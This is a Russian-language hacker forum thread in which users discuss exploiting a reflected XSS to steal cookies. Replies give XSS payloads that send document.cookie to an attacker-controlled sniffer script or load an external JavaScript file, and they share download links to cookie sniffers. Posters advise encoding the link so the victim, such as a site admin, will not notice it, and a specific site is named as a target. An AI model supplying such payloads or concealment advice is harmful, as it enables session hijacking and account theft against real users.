Пассивная ХСС
 

Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )

1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?

Заранее спасибо за ваши ответы.

Дать тому, у кого хочешь свистнуть куки, такую ссылку:

/open.php?url='<script>window.location.href='http://твой_сайт/s.php?'+document.cookie;</script>

где s.php - твой снифер

мда, почитай статьи по xss и вопросы пропадут сами собой, всё просто, любой поймёт

вот тебе мой снифер, может отправлять на почту, а может писать в файл. определяет некоторую инфу о юзере.
http://depositfiles.com/files/d3gf1m5m9

p.s. лучше написать свой ява скрипт, и залить на свой сервер с снифером, ссылка будет лучше
/open.php?url='<script src='http://www.blabla.ru/a.js'></script>

Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.

Возможно при условии, что юзер (админ) окажется лохом и кликнет по ссылке, которую ты ему пришлешь. Только ссылку, которую тебе дал Pashkela запиши в hex или криптани, а то так палевно слишком.
Это либо активка была

Вот есть просто на сайте хсс пассивная вроде, http://freetmd.net/redir.php?url='><script>alert(/xak/)</script>

Как тут куки своровать?( Просто тестировал над собой, и куки не присылалисЬ, присылалась только инфа а куки нет.

Что значит "как"? Посты в теме читал вообще?

Pashkela, читал. Прочитай мой последний пост '' повнимательней '' пожалуйста.

"Просто тестировал над собой"

и что? Это должно мне о чем-то сказать? Например о том, что ты вообще понятие имеешь что такое снифер? И умеешь им ПРАВИЛЬНО пользоваться?

Вот правильный снифер, которым, например, пользуюсь давно уже:

Скачать снифер